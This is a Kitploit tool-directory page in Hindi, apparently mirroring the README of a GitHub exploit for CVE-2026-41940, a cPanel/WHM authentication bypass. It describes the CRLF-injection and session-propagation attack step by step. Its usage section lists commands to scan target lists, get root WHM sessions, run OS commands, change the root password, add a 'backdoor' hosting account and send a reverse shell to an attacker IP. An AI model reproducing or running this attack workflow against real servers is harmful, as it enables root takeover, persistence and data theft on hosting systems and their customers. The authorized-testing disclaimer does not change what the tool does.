Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — cPanel/WHM प्रमाणीकरण बाईपास (ज़ीरो-डे भेद्यता) | Kitploit
उपकरण/GitHubGitHub/kill1234545/cve-2026-41940
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिस्थायित्व तंत्रभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

cPanel/WHM प्रमाणीकरण बाईपास (ज़ीरो-डे भेद्यता)

रिपॉजिटरी देखें
102154 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940: cPanel/WHM प्रमाणीकरण बाईपास (एकल और बहु-लक्ष्य)

अस्वीकरण: यह दस्तावेज़ और संबद्ध स्क्रिप्ट (exploit.py) केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए प्रदान की गई है। इस सॉफ़्टवेयर का उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।

अवलोकन

exploit.py एक स्क्रिप्ट है जो cPanel & WHM में प्रमाणीकरण बाईपास भेद्यता (CVE-2026-41940) को प्रदर्शित करती है। यह भेद्यता एक अनधिकृत हमलावर को CRLF इंजेक्शन दोष के माध्यम से डेमन कैश में रूट सत्र इंजेक्ट करने की अनुमति देती है, जिससे अंततः वैध क्रेडेंशियल्स की आवश्यकता के बिना रूट-स्तरीय WHM पहुँच प्राप्त होती है।

भेद्यता विश्लेषण और एक्सप्लॉइट प्रवाह

यह एक्सप्लॉइट बेसिक प्रमाणीकरण हैंडलिंग तंत्र के भीतर CRLF (कैरिज रिटर्न लाइन फीड) इंजेक्शन भेद्यता का लाभ उठाकर काम करता है, जो सत्र प्रसार दोष के साथ संयुक्त है। यह स्क्रिप्ट हमले को चार चरणों में स्वचालित करती है:

  1. प्री-प्रमाणीकरण सत्र निर्माण: एक बुनियादी अनधिकृत सत्र कुकी (whostmgrsession) प्राप्त करने के लिए सार्वजनिक लॉगिन एंडपॉइंट्स (जैसे, /login/ या /cgi/login.cgi) से कनेक्ट होता है।
  2. CRLF इंजेक्शन: एक क्राफ्टेड बेसिक प्रमाणीकरण हेडर भेजता है जिसमें Base64-एन्कोडेड पेलोड होता है जो रूट सत्र फ़ील्ड्स को सीधे cpsrvd सत्र कैश में इंजेक्ट करता है। सर्वर का रिडायरेक्ट प्रतिक्रिया उत्पन्न सुरक्षा टोकन (cpsess) को लीक कर देती है।
  3. सत्र प्रसार: कच्ची सत्र कुकी एक प्रमाणित WHM एंडपॉइंट पर भेजी जाती है, जो do_token_denied को ट्रिगर करके जाली सत्र को डेमन कैश में प्रसारित करती है — जिससे यह एक वैध प्रमाणित सत्र बन जाता है।
  4. सत्यापन: रूट-स्तरीय पहुँच की पुष्टि करने के लिए जाली सत्र का उपयोग करके प्रतिबंधित WHM API एंडपॉइंट्स (जैसे, /json-api/version) तक पहुँचता है।

आवश्यक शर्तें

  • Python 3.x
  • requests लाइब्रेरी
pip install requests

उपयोग

python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

तर्क

लक्ष्य चयन

तर्कविवरण
--target URLएकल WHM URL (जैसे, https://target:2087)
--target-file FILEलक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक ip:port) — स्वतः चेक मोड सक्षम करता है

नेटवर्क और मुख्य विकल्प

तर्कविवरण
--threads Nबहु-लक्ष्य मोड के लिए समवर्ती थ्रेड (डिफ़ॉल्ट: 10)
--hostname HOSTHost हेडर ओवरराइड करें — तब उपयोग करें जब स्वतः खोज विफल हो या गलत होस्टनाम दे
--timeout Nप्रति-अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15)
--retries Nनेटवर्क त्रुटियों पर पुनः प्रयास गणना (डिफ़ॉल्ट: 3)
--cookie-name NAMEविशिष्ट सत्र कुकी नाम बलपूर्वक सेट करें (छोड़े जाने पर स्वतः पता लगाया जाता है)
--no-verifyचरण 4 सत्यापन छोड़ें और फिर भी आगे बढ़ें

शोषण विकल्प (बाईपास के बाद)

तर्कविवरण
--checkकेवल-जाँच मोड — शोषण किए बिना भेद्यता सत्यापित करें (--target-file के साथ स्वतः सेट होता है)
--password PASSरूट पासवर्ड को PASS में बदलें
--api FUNCविशिष्ट WHM JSON-API फ़ंक्शन को कॉल करें
--api-params K=V,...--api के लिए अल्पविराम-पृथक पैरामीटर
--exec CMDWHM scripts/run_script के माध्यम से OS कमांड निष्पादित करें (फ़ॉलबैक: rawexec)
--sessionरूट वन-क्लिक लॉगिन URL उत्पन्न करें — तुरंत खोलें, टोकन जल्दी समाप्त हो जाता है
--shellइंटरैक्टिव WHM शेल में प्रवेश करें (केवल एकल लक्ष्य)
--dumpसर्वर जानकारी डंप करें: संस्करण, खाते, DNS ज़ोन, विशेषाधिकार
--add-user USER PASS DOMAINनया cPanel होस्टिंग खाता बनाएँ
--revshell LHOST LPORTआपके लिसनर को bash रिवर्स शेल भेजें

आउटपुट विकल्प

तर्कविवरण
--output FILEसत्र टोकन और विवरण को JSON फ़ाइल में सहेजें

उदाहरण

# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

इंटरैक्टिव शेल कमांड

--shell का उपयोग करते समय, निम्नलिखित कमांड उपलब्ध हैं:

कमांडविवरण
api <function> [k=v ...]WHM JSON-API फ़ंक्शन को कॉल करें (जैसे, api version)
exec <command>WHM के माध्यम से OS कमांड चलाएँ (जैसे, exec id)
passwd <newpass>रूट पासवर्ड बदलें
dumpसर्वर जानकारी डंप करें
revshell <lhost> <lport>रिवर्स शेल भेजें
add <user> <pass> <domain>cPanel खाता बनाएँ
save <path>वर्तमान सत्र को फ़ाइल में सहेजें
exit / quitशेल से बाहर निकलें

अनुस्मारक

नवीनतम cPanel/WHM सुरक्षा पैच तुरंत अपडेट करें।

टूल डाउनलोड करें